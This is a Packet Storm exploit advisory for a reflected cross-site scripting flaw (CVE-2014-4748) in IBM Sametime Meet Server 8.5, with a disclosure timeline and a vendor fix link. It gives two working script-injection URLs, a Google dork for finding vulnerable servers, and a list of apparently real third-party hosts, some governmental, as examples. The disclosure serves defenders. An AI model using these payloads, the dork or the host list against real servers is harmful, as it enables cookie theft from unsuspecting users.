what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

IBM Sametime Meet Server 8.5 Cross Site Scripting

IBM Sametime Meet Server 8.5 Cross Site Scripting
Posted Aug 11, 2014
Authored by Adriano Marcio Monteiro

IBM Sametime Meet Server version 8.5 suffers from a reflective cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2014-4748
SHA-256 | e4d190702ff79740508c84c53897a8ccfa7a8e5c69de6ea78f5f8bdead6ace27

IBM Sametime Meet Server 8.5 Cross Site Scripting

Change Mirror Download
# Exploit Title:   IBM Sametime Meet Server 8.5 Reflect Cross Site Script
# Google Dork: intitle:"Meeting Center - IBM Lotus Sametime"
# Date: 11/08/2014
# CVSS Score: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=AV:N/AC:M/Au:N/C:P/I:N/A:N%29
# CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4748
# OSVDB-ID: http://osvdb.org/109444
#
# Author: Adriano Marcio Monteiro
# E-mail: adrianomarciomonteiro@gmail.com
# Blog: http://www.brazucasecurity.com.br
#
# Vendor: http://www.ibm.com
# Software: http://www.ibm.com/sametime
# Version: 8.5.1
# Advisory: https://www-304.ibm.com/support/docview.wss?uid=swg21679221
#
# Test Type: Black Box
# Tested on: Windows 7 Enterprise SP1 x86 pt-br, Mozilla Firefox 30.0 /Internet Explorer 10 / Google Chrome Versão 33.0.1750.146 m



Table of Contents

[0x00] The Vulnerability
[0x01] Exploit Description
[0x02] PoC - Proof of Concept
[0x03] Correction or Workaround
[0x04] Timeline
[0x05] Published
[0x06] References
[0x07] Bibliography



[0x00] The Vulnerabilty

Reflected Cross Site Scripting (XSS)
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page



[0x01] Description

IBM Sametime Classic Meeting Server is vulnerable to reflected cross-site scripting, caused by improper validation of user supplied input. A remote attacker could exploit this vulnerability using a specially crafted URL to execute a script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.



[0x02] PoC - Proof of Concept
For exploit this vulnerability you only need to submit the crafted URL to victim.

http://sametime02.myserver.com.br/stconf.nsf/WebAttendFrameset?OpenAgent&view=Attend&docID=$DOCID$&meetingID=$MEETID$&join_type=mrc&subject=</title><script>alert('I am a XSS')</script><!--&userLang=pt_BR

http://sametime02.myserver.com.br/stconf.nsf/vwCalendar?OpenView&Grid="><script>alert(' I am a XSS')</script><!--&Date=2014-07-28

Examples:

http://sametime.eletrosul.gov.br/stconf.nsf/frmConference?OpenForm
http://sametime.sp.gov.br/stconf.nsf/frmConference?OpenForm
http://sametime.grude.ufmg.br/stconf.nsf/frmConference?OpenForm
http://sametime.schahin.com.br/stconf.nsf/frmConference?OpenForm
http://sametime.c-pack.com.br/stconf.nsf/frmConference?OpenForm
http://www.azi.com.br/stconf.nsf/frmConference?OpenForm
http://aquila.sealinc.org/stconf.nsf/frmConference?Openform
http://noteschat.sola.kommune.no/stconf.nsf/frmConference?Openform
http://comware.net/stconf.nsf/frmConference?Openform
https://236ws.dpteruel.es/stconf.nsf/frmConference?OpenForm
https://correoweb.gruposanjose.biz/stconf.nsf/frmConference?Openform
http://noteschat.sola.kommune.no/stconf.nsf/frmConference?Openform
https://mail.dba.uz/stconf.nsf/frmConference?Openform



[0x03] Correction or Workaround

Apply the procedures described in the follow link:
http://www-01.ibm.com/support/docview.wss?uid=swg21679454



[0x04] Timeline

18/07/2014 - Vulnerabilities discovered
19/07/2014 - Vulnerabilities reporteds to IBM PSIRT Team
23/07/2014 - Advisory and troubleshooting fix published



[0x05] Published

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4748
http://www.securityfocus.com/bid/68841



[0x06] References

OWASP - Cross-site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

CWE-264: Permissions, Privileges, and Access Controls
http://cwe.mitre.org/data/definitions/79.html



[0x07] Bibliography

http://www-10.lotus.com/ldd/stwiki.nsf/xpDocViewer.xsp?lookupName=Administering+Sametime+Standard+8.5.2+documentation#action=openDocument&res_title=Sametime_Meeting_Server_st852&content=pdcontent


[end]
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    7 Files
  • 23
    May 23rd
    111 Files
  • 24
    May 24th
    27 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close